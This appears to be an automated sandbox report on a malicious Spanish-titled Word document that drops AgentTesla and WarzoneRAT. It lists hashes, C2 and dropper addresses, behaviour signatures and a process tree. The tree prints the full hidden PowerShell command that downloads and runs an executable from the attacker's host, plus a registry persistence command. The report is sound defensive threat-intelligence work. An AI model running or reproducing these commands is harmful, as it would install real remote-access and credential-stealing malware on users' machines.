Analysis

  • max time kernel
    148s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-07-2021 18:03

General

  • Target

    Transferencia de fondos .doc

  • Size

    1.0MB

  • MD5

    28463ecd87dbf6503d58e158785965ac

  • SHA1

    12c8088fc0ac36692e9067a1e28c1ef7bf46de46

  • SHA256

    52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d

  • SHA512

    fa9ad0f8a0de9120e0e6439548f7c3c2c22399b06818e3baaacb0ed5306610a385c594a7c7a763509e47bcfa0aa105c9480ebd37f810b7e756eff17697051061

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://hutyrtit.ydns.eu/microF.exe

Extracted

Family

warzonerat

C2

sdafsdffssffs.ydns.eu:6703

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • AgentTesla Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Transferencia de fondos .doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Users\Admin\AppData\Roaming\microF.exe
        "C:\Users\Admin\AppData\Roaming\microF.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Users\Admin\AppData\Local\Temp\microF.exe
          C:\Users\Admin\AppData\Local\Temp\microF.exe
          4⤵
          • Executes dropped EXE
          PID:1180
        • C:\Users\Admin\AppData\Local\Temp\microF.exe
          C:\Users\Admin\AppData\Local\Temp\microF.exe
          4⤵
          • Executes dropped EXE
          PID:1904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Users\Admin\AppData\Roaming\microF.exe
        "C:\Users\Admin\AppData\Roaming\microF.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\microF.exe
          C:\Users\Admin\AppData\Local\Temp\microF.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies WinLogon
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1336
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe"
            5⤵
              PID:1612
            • C:\Users\Admin\AppData\Roaming\KoxayapcG.exe
              "C:\Users\Admin\AppData\Roaming\KoxayapcG.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              PID:992
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1380
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2184
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2396
              • C:\Users\Admin\AppData\Local\Temp\KoxayapcG.exe
                C:\Users\Admin\AppData\Local\Temp\KoxayapcG.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Users\Admin\AppData\Roaming\microF.exe
          "C:\Users\Admin\AppData\Roaming\microF.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1620
          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            C:\Users\Admin\AppData\Local\Temp\microF.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1512
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
              5⤵
                PID:1664
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                  6⤵
                    PID:1764
                • C:\ProgramData\images.exe
                  "C:\ProgramData\images.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1400
                  • C:\Users\Admin\AppData\Local\Temp\images.exe
                    C:\Users\Admin\AppData\Local\Temp\images.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2332
                  • C:\Users\Admin\AppData\Local\Temp\images.exe
                    C:\Users\Admin\AppData\Local\Temp\images.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2348
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:1960

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Registry Run Keys / Startup Folder

          1
          T1060

          Winlogon Helper DLL

          1
          T1004

          Defense Evasion

          Modify Registry

          3
          T1112

          Credential Access

          Credentials in Files

          1
          T1081

          Discovery

          System Information Discovery

          1
          T1082

          Collection

          Data from Local System

          1
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\ProgramData\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
            MD5

            02ff38ac870de39782aeee04d7b48231

            SHA1

            0390d39fa216c9b0ecdb38238304e518fb2b5095

            SHA256

            fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

            SHA512

            24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
            MD5

            75a8da7754349b38d64c87c938545b1b

            SHA1

            5c28c257d51f1c1587e29164cc03ea880c21b417

            SHA256

            bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

            SHA512

            798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
            MD5

            be4d72095faf84233ac17b94744f7084

            SHA1

            cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

            SHA256

            b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

            SHA512

            43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
            MD5

            df44874327d79bd75e4264cb8dc01811

            SHA1

            1396b06debed65ea93c24998d244edebd3c0209d

            SHA256

            55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

            SHA512

            95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
            MD5

            597009ea0430a463753e0f5b1d1a249e

            SHA1

            4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

            SHA256

            3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

            SHA512

            5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
            MD5

            5e3c7184a75d42dda1a83606a45001d8

            SHA1

            94ca15637721d88f30eb4b6220b805c5be0360ed

            SHA256

            8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

            SHA512

            fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
            MD5

            a725bb9fafcf91f3c6b7861a2bde6db2

            SHA1

            8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

            SHA256

            51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

            SHA512

            1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
            MD5

            b6d38f250ccc9003dd70efd3b778117f

            SHA1

            d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

            SHA256

            4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

            SHA512

            67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            MD5

            57d7ded54ae446b434a31583eef67d39

            SHA1

            20b421d59d9e650e76a77d0ac46bb2d15d4e2883

            SHA256

            6d946804df3e72e19405633c4957e0ea7c7e86af5b4d6873b28926587b7202c6

            SHA512

            5e1be6eb70ab4a1ccba536a826d072c560f2d2a5d1ed8f9abcdff43df059f2c265e25d001359f01ff5bb63e048e7a33881c8510d70f09982ae72d3b46fed6e57

          • C:\Users\Admin\AppData\Local\Temp\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • C:\Users\Admin\AppData\Local\Temp\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Roaming\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • C:\Users\Admin\AppData\Roaming\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            d64aad4f145e6a5717b6dd59cfa0b487

            SHA1

            ac01f957c03ba13e5f89c8f4cfe65c6caa3fb562

            SHA256

            fc7e0f5e4db7b7d666a74bb206c13dec0cb3ad971c9c0b0aa3f32e076da7f4e6

            SHA512

            44c7b918a4ef1b5b8aaa0e5d8a9b155a17ab2c66033ac63cb7a0f20c0e4127f64b6ea2a31392a4c403241c40702bec32ef090255f7f44424912bd386607e0e91

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            803d381cbd61380c4cc7b2bafac75574

            SHA1

            2be38f1fd3766d7647036e5be8c0c501346304df

            SHA256

            b8d0516c08ec208d5f1056423d328a2bf69b240f49f5e18c43d8abd946f66c6e

            SHA512

            06f8bd91d4d553b0ce2be40e2e46579b815627dde074d8c202f319e2749c54136fb13b4b547cb81b415fe006d4391054fcbaf2a4a919a74f967b634e670faac8

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            d64aad4f145e6a5717b6dd59cfa0b487

            SHA1

            ac01f957c03ba13e5f89c8f4cfe65c6caa3fb562

            SHA256

            fc7e0f5e4db7b7d666a74bb206c13dec0cb3ad971c9c0b0aa3f32e076da7f4e6

            SHA512

            44c7b918a4ef1b5b8aaa0e5d8a9b155a17ab2c66033ac63cb7a0f20c0e4127f64b6ea2a31392a4c403241c40702bec32ef090255f7f44424912bd386607e0e91

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            803d381cbd61380c4cc7b2bafac75574

            SHA1

            2be38f1fd3766d7647036e5be8c0c501346304df

            SHA256

            b8d0516c08ec208d5f1056423d328a2bf69b240f49f5e18c43d8abd946f66c6e

            SHA512

            06f8bd91d4d553b0ce2be40e2e46579b815627dde074d8c202f319e2749c54136fb13b4b547cb81b415fe006d4391054fcbaf2a4a919a74f967b634e670faac8

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            803d381cbd61380c4cc7b2bafac75574

            SHA1

            2be38f1fd3766d7647036e5be8c0c501346304df

            SHA256

            b8d0516c08ec208d5f1056423d328a2bf69b240f49f5e18c43d8abd946f66c6e

            SHA512

            06f8bd91d4d553b0ce2be40e2e46579b815627dde074d8c202f319e2749c54136fb13b4b547cb81b415fe006d4391054fcbaf2a4a919a74f967b634e670faac8

          • C:\Users\Admin\AppData\Roaming\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Roaming\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Roaming\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • C:\Users\Admin\AppData\Roaming\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \??\PIPE\srvsvc
            MD5

            d41d8cd98f00b204e9800998ecf8427e

            SHA1

            da39a3ee5e6b4b0d3255bfef95601890afd80709

            SHA256

            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

            SHA512

            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          • \Program Files\Microsoft DN1\sqlmap.dll
            MD5

            461ade40b800ae80a40985594e1ac236

            SHA1

            b3892eef846c044a2b0785d54a432b3e93a968c8

            SHA256

            798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

            SHA512

            421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

          • \ProgramData\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\KoxayapcG.exe
            MD5

            7f5e840ecce813d3df4e099180ab6f2f

            SHA1

            a1697634865d09c961a548f09942bb820fda5512

            SHA256

            6e8ba9ccbcfe6fb5e8ff5ba198398b3e7994f8afc6d51140496a3b4c1d67e20f

            SHA512

            29038c6bc5e90d0ff1356057fb21c1ddd420c8d24863a67247dc1730ad8fe17f240e55b9cc8d84b18137b73055da1b8f95c84458ac609f456292745595309813

          • \Users\Admin\AppData\Local\Temp\freebl3.dll
            MD5

            ef12ab9d0b231b8f898067b2114b1bc0

            SHA1

            6d90f27b2105945f9bb77039e8b892070a5f9442

            SHA256

            2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7

            SHA512

            2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193

          • \Users\Admin\AppData\Local\Temp\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\images.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

            3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592

          • \Users\Admin\AppData\Local\Temp\microF.exe
            MD5

            069c9912fa773cada0e357556182f089

            SHA1

            4f3e4f2d9b361b5747baeeb0178908a2f8d3339c

            SHA256

            2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03

            SHA512

